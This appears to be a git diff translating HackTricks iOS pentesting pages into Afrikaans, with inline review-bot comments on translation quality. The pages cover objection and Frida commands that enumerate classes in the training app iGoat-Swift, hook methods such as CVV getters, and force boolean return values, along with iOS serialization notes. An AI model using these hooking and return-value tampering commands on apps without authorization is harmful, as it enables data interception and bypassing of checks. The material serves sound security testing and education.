'n gelaai module - ```bash - memory list modules - Name Base Size Path - ----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------ - iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54... - SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib - SystemConfiguration 0x1aa842000 495616 (484.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio... 
- libc++.1.dylib 0x1bdcfd000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib - libz.1.dylib 0x1efd3c000 73728 (72.0 KiB) /usr/lib/libz.1.dylib - libsqlite3.dylib 0x1c267f000 1585152 (1.5 MiB) /usr/lib/libsqlite3.dylib - Foundation 0x1ab550000 2732032 (2.6 MiB) /System/Library/Frameworks/Foundation.framework/Foundation - libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib - [...] - ``` -* `memory list exports `: Exports of a loaded module +```bash +memory list exports iGoat-Swift +Type Name Address +-------- -------------------------------------------------------------------------------------------------------------------------------------- ----------- +variable _mh_execute_header 0x104ffc000 +function _mdictof 0x10516cb88 +function _ZN9couchbase6differ10BaseDifferD2Ev 0x10516486c +function _ZN9couchbase6differ10BaseDifferD1Ev 0x1051648f4 +function _ZN9couchbase6differ10BaseDifferD0Ev 0x1051648f8 +function _ZN9couchbase6differ10BaseDiffer5setupEmm 0x10516490c +function _ZN9couchbase6differ10BaseDiffer11allocStripeEmm 0x105164a20 +function _ZN9couchbase6differ10BaseDiffer7computeEmmj 0x105164ad8 +function _ZN9couchbase6differ10BaseDiffer7changesEv 0x105164de4 +function _ZN9couchbase6differ10BaseDiffer9addChangeENS0_6ChangeE 0x105164fa8 +function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS0_6ChangeE 0x1051651d8 +function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS1_6vectorINS0_6ChangeENS1_9allocatorIS8_EEEE 0x105165280 +variable _ZTSN9couchbase6differ10BaseDifferE 0x1051d94f0 +variable _ZTVN9couchbase6differ10BaseDifferE 0x10523c0a0 +variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8 +[..] 
+``` +## Lys klasse van 'n APP - ```bash - memory list exports iGoat-Swift - Type Name Address - -------- -------------------------------------------------------------------------------------------------------------------------------------- ----------- - variable _mh_execute_header 0x104ffc000 - function _mdictof 0x10516cb88 - function _ZN9couchbase6differ10BaseDifferD2Ev 0x10516486c - function _ZN9couchbase6differ10BaseDifferD1Ev 0x1051648f4 - function _ZN9couchbase6differ10BaseDifferD0Ev 0x1051648f8 - function _ZN9couchbase6differ10BaseDiffer5setupEmm 0x10516490c - function _ZN9couchbase6differ10BaseDiffer11allocStripeEmm 0x105164a20 - function _ZN9couchbase6differ10BaseDiffer7computeEmmj 0x105164ad8 - function _ZN9couchbase6differ10BaseDiffer7changesEv 0x105164de4 - function _ZN9couchbase6differ10BaseDiffer9addChangeENS0_6ChangeE 0x105164fa8 - function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS0_6ChangeE 0x1051651d8 - function _ZN9couchbase6differlsERNSt3__113basic_ostreamIcNS1_11char_traitsIcEEEERKNS1_6vectorINS0_6ChangeENS1_9allocatorIS8_EEEE 0x105165280 - variable _ZTSN9couchbase6differ10BaseDifferE 0x1051d94f0 - variable _ZTVN9couchbase6differ10BaseDifferE 0x10523c0a0 - variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8 - [..] - ``` +* `ios hooking list classes`: Lys klasse van die app -## List classes of an APP +```bash +ios hooking list classes -* `ios hooking list classes`: List classes of the app +AAAbsintheContext +AAAbsintheSigner +AAAbsintheSignerContextCache +AAAcceptedTermsController +AAAccount +AAAccountManagementUIResponse +AAAccountManager +AAAddEmailUIRequest +AAAppleIDSettingsRequest +AAAppleTVRequest +AAAttestationSigner +[...] +``` +* `ios hooking search classes `: Soek 'n klas wat 'n string bevat. 
Jy kan **soek na 'n unieke term wat verband hou met die hoof app-pakket** naam om die hoofklasse van die app te vind, soos in die voorbeeld: - ```bash - ios hooking list classes +```bash +ios hooking search classes iGoat +iGoat_Swift.CoreDataHelper +iGoat_Swift.RCreditInfo +iGoat_Swift.SideContainmentSegue +iGoat_Swift.CenterContainmentSegue +iGoat_Swift.KeyStorageServerSideVC +iGoat_Swift.HintVC +iGoat_Swift.BinaryCookiesExerciseVC +iGoat_Swift.ExerciseDemoVC +iGoat_Swift.PlistStorageExerciseViewController +iGoat_Swift.CouchBaseExerciseVC +iGoat_Swift.MemoryManagementVC +[...] +``` - AAAbsintheContext - AAAbsintheSigner - AAAbsintheSignerContextCache - AAAcceptedTermsController - AAAccount - AAAccountManagementUIResponse - AAAccountManager - AAAddEmailUIRequest - AAAppleIDSettingsRequest - AAAppleTVRequest - AAAttestationSigner - [...] - ``` -* `ios hooking search classes `: Search a class that contains a string. You can **search some uniq term that is related to the main app package** name to find the main classes of the app like in the example: +## Lys klasmetodes - ```bash - ios hooking search classes iGoat - iGoat_Swift.CoreDataHelper - iGoat_Swift.RCreditInfo - iGoat_Swift.SideContainmentSegue - iGoat_Swift.CenterContainmentSegue - iGoat_Swift.KeyStorageServerSideVC - iGoat_Swift.HintVC - iGoat_Swift.BinaryCookiesExerciseVC - iGoat_Swift.ExerciseDemoVC - iGoat_Swift.PlistStorageExerciseViewController - iGoat_Swift.CouchBaseExerciseVC - iGoat_Swift.MemoryManagementVC - [...] 
- ``` +* `ios hooking list class_methods`: Lys metodes van 'n spesifieke klas -## List class methods +```bash +ios hooking list class_methods iGoat_Swift.RCreditInfo +- cvv +- setCvv: +- setName: +- .cxx_destruct +- name +- cardNumber +- init +- initWithValue: +- setCardNumber: +``` +* `ios hooking search methods `: Soek 'n metode wat 'n string bevat -* `ios hooking list class_methods`: List methods of a specific class +```bash +ios hooking search methods cvv +[AMSFinanceVerifyPurchaseResponse + _dialogRequestForCVVFromPayload:verifyType:] +[AMSFinanceVerifyPurchaseResponse - _handleCVVDialogResult:shouldReattempt:] +[AMSFinanceVerifyPurchaseResponse - _runCVVRequestForCode:error:] +[iGoat_Swift.RCreditInfo - cvv] +[iGoat_Swift.RCreditInfo - setCvv:] +[iGoat_Swift.RealmExerciseVC - creditCVVTextField] +[iGoat_Swift.RealmExerciseVC - setCreditCVVTextField:] +[iGoat_Swift.DeviceLogsExerciseVC - cvvTextField] +[iGoat_Swift.DeviceLogsExerciseVC - setCvvTextField:] +[iGoat_Swift.CloudMisconfigurationExerciseVC - cvvTxtField] +[iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] +``` - ```bash - ios hooking list class_methods iGoat_Swift.RCreditInfo - - cvv - - setCvv: - - setName: - - .cxx_destruct - - name - - cardNumber - - init - - initWithValue: - - setCardNumber: - ``` -* `ios hooking search methods `: Search a method that contains a string +# Basiese Hooking - ```bash - ios hooking search methods cvv - [AMSFinanceVerifyPurchaseResponse + _dialogRequestForCVVFromPayload:verifyType:] - [AMSFinanceVerifyPurchaseResponse - _handleCVVDialogResult:shouldReattempt:] - [AMSFinanceVerifyPurchaseResponse - _runCVVRequestForCode:error:] - [iGoat_Swift.RCreditInfo - cvv] - [iGoat_Swift.RCreditInfo - setCvv:] - [iGoat_Swift.RealmExerciseVC - creditCVVTextField] - [iGoat_Swift.RealmExerciseVC - setCreditCVVTextField:] - [iGoat_Swift.DeviceLogsExerciseVC - cvvTextField] - [iGoat_Swift.DeviceLogsExerciseVC - setCvvTextField:] - 
[iGoat_Swift.CloudMisconfigurationExerciseVC - cvvTxtField] - [iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:] - ``` +Nou dat jy die klasse en modules wat deur die toepassing gebruik word, **opgesom** het, het jy dalk 'n paar **interessante klas- en metodenamen** gevind. -# Basic Hooking +## Haak alle metodes van 'n klas -Now that you have **enumerated the classes and modules** used by the application you may have found some **interesting class and method names**. +* `ios hooking watch class `: Haak al die metodes van 'n klas, dump al die aanvanklike parameters en terugvoer -## Hook all methods of a class +```bash +ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController +``` -* `ios hooking watch class `: Hook all the methods of a class, dump all the initial parameters and returns +## Haak 'n enkele metode - ```bash - ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController - ``` +* `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Haak 'n spesifieke metode van 'n klas deur die parameters, terugvoer en terugvoer van die metode elke keer wat dit geroep word, te dump -## Hook a single method +```bash +ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return +``` -* `ios hooking watch method "-[ ]" --dump-args --dump-return --dump-backtrace`: Hook an specific method of a class dumping the parameters, backtraces and returns of the method each time it's called +## Verander Booleaanse Terugvoer - ```bash - ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return - ``` +* `ios hooking set return_value "-[ ]" false`: Dit sal die geselekteerde metode laat terugkeer na die aangeduide booleaanse waarde -## Change Boolean Return +```bash +ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false +``` -* `ios hooking set return_value 
"-[ ]" false`: This will make the selected method return the indicated boolean - - ```bash - ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false - ``` - -## Generate hooking template +## Genereer haak sjabloon * `ios hooking generate simple `: - ```bash - ios hooking generate simple iGoat_Swift.RCreditInfo +```bash +ios hooking generate simple iGoat_Swift.RCreditInfo - var target = ObjC.classes.iGoat_Swift.RCreditInfo; +var target = ObjC.classes.iGoat_Swift.RCreditInfo; - Interceptor.attach(target['+ sharedSchema'].implementation, { - onEnter: function (args) { - console.log('Entering + sharedSchema!'); - }, - onLeave: function (retval) { - console.log('Leaving + sharedSchema'); - }, - }); +Interceptor.attach(target['+ sharedSchema'].implementation, { +onEnter: function (args) { +console.log('Entering + sharedSchema!'); +}, +onLeave: function (retval) { +console.log('Leaving + sharedSchema'); +}, +}); - Interceptor.attach(target['+ className'].implementation, { - onEnter: function (args) { - console.log('Entering + className!'); - }, - onLeave: function (retval) { - console.log('Leaving + className'); - }, - }); +Interceptor.attach(target['+ className'].implementation, { +onEnter: function (args) { +console.log('Entering + className!'); +}, +onLeave: function (retval) { +console.log('Leaving + className'); +}, +}); - Interceptor.attach(target['- cvv'].implementation, { - onEnter: function (args) { - console.log('Entering - cvv!'); - }, - onLeave: function (retval) { - console.log('Leaving - cvv'); - }, - }); +Interceptor.attach(target['- cvv'].implementation, { +onEnter: function (args) { +console.log('Entering - cvv!'); +}, +onLeave: function (retval) { +console.log('Leaving - cvv'); +}, +}); - Interceptor.attach(target['- setCvv:'].implementation, { - onEnter: function (args) { - console.log('Entering - setCvv:!'); - }, - onLeave: function (retval) { - console.log('Leaving - setCvv:'); - }, - }); - ``` 
+Interceptor.attach(target['- setCvv:'].implementation, { +onEnter: function (args) { +console.log('Entering - setCvv:!'); +}, +onLeave: function (retval) { +console.log('Leaving - setCvv:'); +}, +}); +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
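Review bot: The translated description of `ios hooking watch method` loses the backtraces and repeats "terugvoer" ("die parameters, terugvoer en terugvoer van die metode"), while the removed English line lists "the parameters, backtraces and returns"; suggest "die parameters, stapelspore en terugkeerwaardes van die metode" so the `--dump-backtrace` flag in the command that follows is still explained ("terugvoer" also reads as "feedback" rather than "return value"). The same hunk strips the leading indentation from every fenced block, so the `+```bash` fences are no longer nested under their `*` list items and the generated Frida template now has `+onEnter: function (args) {` and `+console.log('Entering + sharedSchema!');` at column 0, which changes the rendered list structure and makes the JavaScript harder to read; keep the original four-space indentation inside the `+` lines. Minor: the closing banner leaves "github repos" untranslated while the opening banner in the same hunk renders it as "GitHub-opslagplekke"; use one form.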
- - diff --git a/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index 19e9f14ee..dfa9021ee 100644 --- a/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -1,21 +1,19 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# WebView Protocol Handlers +# WebView-protokolhanteraars @@ -23,16 +21,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index 24a7239aa..af119f47f 100644 --- a/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -1,98 +1,86 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Code and more information in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). +Kode en meer inligting in [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence). -## Object Serialization in iOS Development +## Objekserialisering in iOS-ontwikkeling -In iOS, **object serialization** involves converting objects into a format that can be easily stored or transmitted, and then reconstructing them from this format when needed. Two main protocols, **`NSCoding`** and **`NSSecureCoding`**, facilitate this process for Objective-C or `NSObject` subclasses, allowing objects to be serialized into **`NSData`**, a format that wraps byte buffers. - -### **`NSCoding`** Implementation -To implement `NSCoding`, a class must inherit from `NSObject` or be marked as `@objc`. This protocol mandates the implementation of two methods for encoding and decoding instance variables: +In iOS behels **objekserialisering** die omskakeling van objekte na 'n formaat wat maklik gestoor of oorgedra kan word, en dan die herkonstruksie daarvan uit hierdie formaat wanneer dit nodig is. Twee hoofprotokolle, **`NSCoding`** en **`NSSecureCoding`**, fasiliteer hierdie proses vir Objective-C of `NSObject` subklasse, wat objekte kan serialiseer na **`NSData`**, 'n formaat wat bytebuffers omhul. +### **`NSCoding`**-implementering +Om `NSCoding` te implementeer, moet 'n klas van `NSObject` erf of gemerk word as `@objc`. 
Hierdie protokol vereis die implementering van twee metodes vir die enkodeer en dekodeer van instansie-variables: ```swift class CustomPoint: NSObject, NSCoding { - var x: Double = 0.0 - var name: String = "" +var x: Double = 0.0 +var name: String = "" - func encode(with aCoder: NSCoder) { - aCoder.encode(x, forKey: "x") - aCoder.encode(name, forKey: "name") - } +func encode(with aCoder: NSCoder) { +aCoder.encode(x, forKey: "x") +aCoder.encode(name, forKey: "name") +} - required convenience init?(coder aDecoder: NSCoder) { - guard let name = aDecoder.decodeObject(forKey: "name") as? String else { return nil } - self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name) - } +required convenience init?(coder aDecoder: NSCoder) { +guard let name = aDecoder.decodeObject(forKey: "name") as? String else { return nil } +self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name) +} } ``` - -### **Enhancing Security with `NSSecureCoding`** -To mitigate vulnerabilities where attackers inject data into already constructed objects, **`NSSecureCoding`** offers an enhanced protocol. Classes conforming to `NSSecureCoding` must verify the type of objects during decoding, ensuring that only the expected object types are instantiated. However, it's crucial to note that while `NSSecureCoding` enhances type safety, it doesn't encrypt data or ensure its integrity, necessitating additional measures for protecting sensitive information: - +### **Verbetering van veiligheid met `NSSecureCoding`** +Om kwetsbaarheden te verminder waar aanvallers data in reeds geconstrueerde objekte inspuit, bied **`NSSecureCoding`** 'n verbeterde protokol. Klasse wat voldoen aan `NSSecureCoding` moet die tipe van objekte verifieer tydens dekodering, om te verseker dat slegs die verwagte objek tipes geïnstantieer word. 
Dit is egter belangrik om op te let dat terwyl `NSSecureCoding` tipe veiligheid verbeter, dit nie data enkripsie of die versekering van integriteit verseker nie, en dus addisionele maatreëls nodig is om sensitiewe inligting te beskerm: ```swift static var supportsSecureCoding: Bool { - return true +return true } let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey") ``` - -## Data Archiving with `NSKeyedArchiver` -`NSKeyedArchiver` and its counterpart, `NSKeyedUnarchiver`, enable encoding objects into a file and later retrieving them. This mechanism is useful for persisting objects: - +## Data-argivering met `NSKeyedArchiver` +`NSKeyedArchiver` en sy eweknie, `NSKeyedUnarchiver`, maak dit moontlik om voorwerpe in 'n lêer te enkodeer en later te herwin. Hierdie meganisme is nuttig vir die volharding van voorwerpe: ```swift NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive") let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint ``` - -### Using `Codable` for Simplified Serialization -Swift's `Codable` protocol combines `Decodable` and `Encodable`, facilitating the encoding and decoding of objects like `String`, `Int`, `Double`, etc., without extra effort: - +### Gebruik van `Codable` vir Vereenvoudigde Serialisering +Swift se `Codable` protokol kombineer `Decodable` en `Encodable`, wat die enkodering en dekodering van voorwerpe soos `String`, `Int`, `Double`, ens., sonder ekstra moeite fasiliteer: ```swift struct CustomPointStruct: Codable { - var x: Double - var name: String +var x: Double +var name: String } ``` +Hierdie benadering ondersteun reguit serialisering na en vanaf eiendomlyste en JSON, wat datahantering in Swift-toepassings verbeter. -This approach supports straightforward serialization to and from property lists and JSON, enhancing data handling in Swift applications. 
+## JSON en XML-koderingsalternatiewe +Afgesien van ingeboude ondersteuning, bied verskeie derdeparty biblioteke JSON- en XML-kodering/ontkodering, elk met sy eie prestasiekenmerke en veiligheidsoorwegings. Dit is noodsaaklik om hierdie biblioteke sorgvuldig te kies, veral om kwesbaarhede soos XXE (XML External Entities) aanvalle te verminder deur ontleders te konfigureer om eksterne entiteitsverwerking te voorkom. -## JSON and XML Encoding Alternatives -Beyond native support, several third-party libraries offer JSON and XML encoding/decoding capabilities, each with its own performance characteristics and security considerations. It's imperative to carefully select these libraries, especially to mitigate vulnerabilities like XXE (XML External Entities) attacks by configuring parsers to prevent external entity processing. - -### Security Considerations -When serializing data, especially to the file system, it's essential to be vigilant about the potential inclusion of sensitive information. Serialized data, if intercepted or improperly handled, can expose applications to risks such as unauthorized actions or data leakage. Encrypting and signing serialized data is recommended to enhance security. +### Veiligheidsoorwegings +Wanneer data geserialiseer word, veral na die lêersisteem, is dit noodsaaklik om waaksaam te wees oor die moontlike insluiting van sensitiewe inligting. Geserialiseerde data, as dit onderskep of verkeerd hanteer word, kan toepassings blootstel aan risiko's soos ongemagtigde aksies of datalekke. Dit word aanbeveel om geserialiseerde data te versleutel en te onderteken om die veiligheid te verbeter. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
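Review bot: the Swift code fences in this hunk are altered by the translation, which strips the leading indentation inside them (`- return true` becomes `+return true`, and `- var x: Double` / `- var name: String` become `+var x: Double` / `+var name: String`); code blocks should pass through the translation workflow unchanged, so restore the original indentation. Terminology is also inconsistent within the same page: the `NSSecureCoding` paragraph says "data enkripsie" while the "Veiligheidsoorwegings" paragraph says "te versleutel"; pick one Afrikaans term for encryption and use it throughout. In the footer the link text "SUBSCRIPTION PLANS" is left in English while the sentence around it is translated.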
- - diff --git a/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-pentesting/ios-pentesting/ios-testing-environment.md index 6835f7f4f..ebb617817 100644 --- a/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -1,151 +1,149 @@ -# iOS Testing Environment +# iOS Toetsomgewing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* 